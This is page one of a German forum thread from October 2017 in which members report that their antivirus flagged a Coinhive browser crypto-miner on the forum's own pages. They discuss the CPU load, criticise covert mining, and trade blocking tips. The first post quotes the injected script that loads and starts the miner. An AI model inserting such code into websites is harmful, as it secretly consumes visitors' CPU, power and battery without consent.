Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 15 von 94

Thema: Coinhive Crypto-Miner

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    marcusysk
    Gast

    Standard Coinhive Crypto-Miner

    Hallo liebe Forums-Admins,

    mein Virenscanner ist gerade beim Aufrufen der Titelseite angeschlagen. Offensichtlich ist JS-Code in den Quelltext eingefügt worden, der über die Website "Coinhive" versucht Bitcoins zu minen ohne die Nutzer zu fragen:

    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
    var miner = new CoinHive.Anonymous('D1t6CmXN8rXhZOQFKY6D97xUsSJ1ag FD');
    miner.start();
    </script>


    Ich finde das ehrlich gesagt nicht lustig und vielleicht könnte mal jemand dazu Stellung beziehen? Allen anderen bis dahin erstmal zur Info.

    https://www.golem.de/news/kryptowaeh...10-130403.html

    Marcus
    Geändert von marcusysk (05.10.2017 um 16:12 Uhr)

  2. #2
    Power User
    Registriert seit
    28.06.2010
    Beiträge
    437
    Renommee-Modifikator
    32859

    Standard

    Das kann ich ebenfalls bestätigen, auch ich bekomme eine Warnung. Es ist kein üblicher Trojaner oder Virus, aber es nutzt Javascript, damit dann der eigene Rechner eine Kryptowährung bzw. die Blockchain rechnet. So wird der PC bzw. die CPU stark belastet und man gewährt unfreiwillig die Rechenkapazität des eigenen Rechners zum Zwecke anderer, die daran verdienen.

    Die Admins sollten hier eine Stellung dazu geben!
    Geändert von pizzabote (05.10.2017 um 21:47 Uhr)

  3. #3
    Power+ User
    Registriert seit
    08.04.2011
    Beiträge
    1.301
    Renommee-Modifikator
    6799014

    Standard

    Hab dasselbe Problem gehabt.

  4. #4
    Samenspender
    Registriert seit
    06.05.2010
    Beiträge
    589
    Renommee-Modifikator
    1920147

    Standard

    Mein G DATA Total Security meldet sich auch.Klicke auf die Grafik für eine größere Ansicht 

Name:	Unbenannt.jpg 
Hits:	111 
Größe:	362,8 KB 
ID:	53119


    Junkware (PUP): Application.BitCoinMiner.SX (Engine A)
    Datei: CE94BF5164C04AE312403C4CA6A85F4F3B1133A2
    Verzeichnis: C:\Users\Harichter_2\AppData\Local\Mozilla\Firefox \Profiles\8qy6ymxb.default\cache2\entries
    Prozess: firefox.exe
    Geändert von Hades (05.10.2017 um 22:43 Uhr)

  5. #5
    Mod Nord/Ost&Berlin Avatar von Heineken77
    Registriert seit
    29.12.2009
    Ort
    zwischen Hannover und Braunschweig
    Alter
    46
    Beiträge
    6.284
    Renommee-Modifikator
    334467

    Standard

    Ihr meint soetwas hier?

    Klicke auf die Grafik für eine größere Ansicht 

Name:	cpu.jpg 
Hits:	124 
Größe:	165,2 KB 
ID:	53121

    Ich weiß aber auch nicht woher das kommt. Ich versuche mich mal schlau zu machen.

    Update: Hmm, jetzt ist es weg
    Geändert von Heineken77 (05.10.2017 um 23:07 Uhr)
    Mod, nicht Admin!

  6. #6
    Power User
    Registriert seit
    24.08.2009
    Beiträge
    135
    Renommee-Modifikator
    8933

    Standard

    Mein Rechner lief auf Volllast. Safari steigt dann mit Fehlermeldung aus. Runtergefahren, hochgefahren, Javascript deaktiviert. Alles gut jetzt. Trotzdem bin ich etwas irritiert. Komisches Gefühl, wenn der eigene Rechner Dinge für Fremde tut, die man nicht in Auftrag gegeben hat.
    Geändert von tee100 (05.10.2017 um 23:24 Uhr)

  7. #7
    Samenspender
    Registriert seit
    06.05.2010
    Beiträge
    589
    Renommee-Modifikator
    1920147

    Standard Coinhive Crypto-Miner

    Ich habe vollkommenes Verständnis dafür, dass ein Forum finanziert sein will. Ob Bannerwerbung, Mitgliedsbeiträge oder was weiß ich. Dass man den Usern allerdings etwas heimlich unterjubelt, was ihre Maschinenlast deutlich erhöht, das finde ich schon ein ziemlich starkes Stück. Und unprofessionell. Ich meine Akkulaufzeiten und auch Lebensdauern von CPUs. Mit einer rechtzeitigen Kommunikation hätte man sich die jetzige Aufregung erspart und bestimmt auch Verständnis von den Usern erhalten.

    Da Verantwortliche immer noch schweigen sieht es für mich nach dem Bubenstück aus, das ich wie oben erwähnt kritisiere.
    Geändert von Hades (06.10.2017 um 11:54 Uhr)

  8. #8
    Fiststueck
    Gast

    Standard

    Tja, wer immer noch glaubt, irgendwer tue irgendwas ganz ohne kommerziellen Hintergrund, uneigennützig, ehrenamtlich, aus ideologischen Gründen - der vergißt, von sich auf andere zu schliessen.

  9. #9
    Power+ User
    Registriert seit
    08.04.2011
    Beiträge
    1.301
    Renommee-Modifikator
    6799014

    Standard

    Da muss ich Hades zustimmen. Bin jetzt auch sehr irritiert.

  10. #10
    Mod Nord/Ost&Berlin Avatar von Heineken77
    Registriert seit
    29.12.2009
    Ort
    zwischen Hannover und Braunschweig
    Alter
    46
    Beiträge
    6.284
    Renommee-Modifikator
    334467

    Standard

    Zitat Zitat von Fiststueck Beitrag anzeigen
    Tja, wer immer noch glaubt, irgendwer tue irgendwas ganz ohne kommerziellen Hintergrund, uneigennützig, ehrenamtlich, aus ideologischen Gründen - der vergißt, von sich auf andere zu schliessen.
    Das Forum ist schon lange kostenpflichtig, von daher ist das ja nichts neues.


    Zitat Zitat von Hades Beitrag anzeigen
    Ich habe vollkommenes Verständnis dafür, dass ein Forum finanziert sein will. Ob Bannerwerbung, Mitgliedsbeiträge oder was weiß ich. Dass man den Usern allerdings etwas heimlich unterjubelt, was ihre Maschinenlast deutlich erhöht, das finde ich schon ein ziemlich starkes Stück. Und unprofessionell. Ich meine Akkulaufzeiten und auch Lebensdauern von CPUs. Mit einer rechtzeitigen Kommunikation hätte man sich die jetzige Aufregung erspart und bestimmt auch Verständnis von den Usern erhalten.

    Da Verantwortliche immer noch schweigen sieht es für mich nach dem Bubenstück aus, das ich wie oben erwähnt kritisiere.
    So wie ich das im Moment sehe hat wohl eher jemand getestet ob und wie das Ganze überhaupt funktioniert. Von daher sehe ich (noch) keine Veranlassung dazu das zu kommunizieren. Deutlich ist aber auch das derjenige der das implementiert hat "ein wenig" über das Ziel herausgeschossen ist. Für einen Test spricht auch der kurze Zeitraum in dem er stattgefunden hat.

    So, oder so: Auch ich stelle im Moment nur Vermutungen an, sobald ich was handfestes weiß lasse ich es euch wissen.
    Mod, nicht Admin!

  11. #11
    Freier Forenpirat Avatar von straker
    Registriert seit
    17.12.2009
    Ort
    Frankfurt/M und Rest der Welt
    Beiträge
    2.525
    Renommee-Modifikator
    46182

    Standard

    Heute blockt mir mein Virenscanner bei jedem Aufrufen unserer Forenseite (und nur bei dieser Seite!) einen " JS:Miner-A "

    Habe keine Ahnung was das ist, jedenfalls mag ihn mein Scanner nicht -meistens hat er recht!
    Essen und Beischlaf sind die beiden größten Begierden des Mannes (Kunfuze)

  12. #12
    Power+ User
    Registriert seit
    01.02.2010
    Beiträge
    998
    Renommee-Modifikator
    2485

    Standard

    Meine Maschine läuft in kürzester Zeit auf 100% CPU Last.
    Dies ist seit zwei Tagen so.

    Wann fliegt das Script endlich wieder raus?

  13. #13
    Power+ User
    Registriert seit
    01.02.2010
    Beiträge
    998
    Renommee-Modifikator
    2485

    Standard

    Zitat Zitat von Osiris Beitrag anzeigen
    Meine Maschine läuft in kürzester Zeit auf 100% CPU Last.Dies ist seit zwei Tagen so.Wann fliegt das Script endlich wieder raus?
    JS komplett zu deaktivieren ist für mich nicht praktikabel. Aber bei den von mir genutzen Browsern kann ich einzelne URL hinterlegen bei denen JS dann deaktiviert ist.Für mich ist die Sache technisch erledigt.

  14. #14
    Power User
    Registriert seit
    19.08.2012
    Beiträge
    431
    Renommee-Modifikator
    957043

    Standard

    Ich stimme hades zu, so etwas ist ein Unding.
    Wenn man versucht Geld zu verdienen über einen offiziellen Weg wie Werbe-Banner schalten oder Mitgliedsgebühren zu verlangen ist es ok,
    aber zu versuchen heimlich über erhöhte Stromkosten und CPU-Verbrauch den Kunden Geld aus der Tasche zu ziehen, ist es scheiße.
    Viel Gewinn lässt sich damit sowieso nicht machen, glaub ich, nur wenn man Millionen Besucher hat oder so.
    In letzter Zeit habe ich auf diversen News-Seiten von Crypto-Mining gelesen, und wie es heimlich Webseiten wie Pirate Bay mit vielen Benutzern implementieren um
    Geld aus der Tasche der Kunden zu ziehen. Crypto-Mining lohnt sich dann, wenn der Gewinn die Stromkosten für den CPU/GPU-Verbrauch übersteigt.

    Ich benutze Firefox mit dem Addon uBlock Origin, welches nicht nur Werbung sondern zum Glück auch Crypto-Miner blocken.
    Noscript benutze ich ungern da sonst viele andere Features von Webseiten mit JS besuche.

    Wenn hier Leute wie heineken77 von "testen" oder "experimentieren" reden, ist das für mich eine billige Ausrede.

  15. #15
    Mod Nord/Ost&Berlin Avatar von Heineken77
    Registriert seit
    29.12.2009
    Ort
    zwischen Hannover und Braunschweig
    Alter
    46
    Beiträge
    6.284
    Renommee-Modifikator
    334467

    Standard

    Zitat Zitat von trustno Beitrag anzeigen
    Wenn hier Leute wie heineken77 von "testen" oder "experimentieren" reden, ist das für mich eine billige Ausrede.
    Nein, ist es nicht. Es ist einfach meine persönliche Meinung. Ich habe mit dem technischem Aufbau und der Finanzierung des Forums nichts zu tun. Und ich schrieb ja auch, das die Nutzung des Miners in dieser Form Mist ist. Ich sagte das ich die Idee grundsätlich nicht schlecht finde, allerdings sollte man halt die CPU-Last stark begrenzen. Ob die CPU ein paar % mehr, oder weniger leisten muss fällt nicht wirklich ins Gewicht. Eine volle Auslastung aber durchaus. Bei mir würde das einen Unterschied von über 150W ausmachen und ja, das ist heftig. Und ich stimme auch damit überein, das soetwas kommuniziert werden muss. Ich meinte dahingehend nur das ich es im Moment noch nicht für nötig erachte, weil ich das wirklich für einen Testlauf halte.
    Mod, nicht Admin!

Seite 1 von 2 12 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •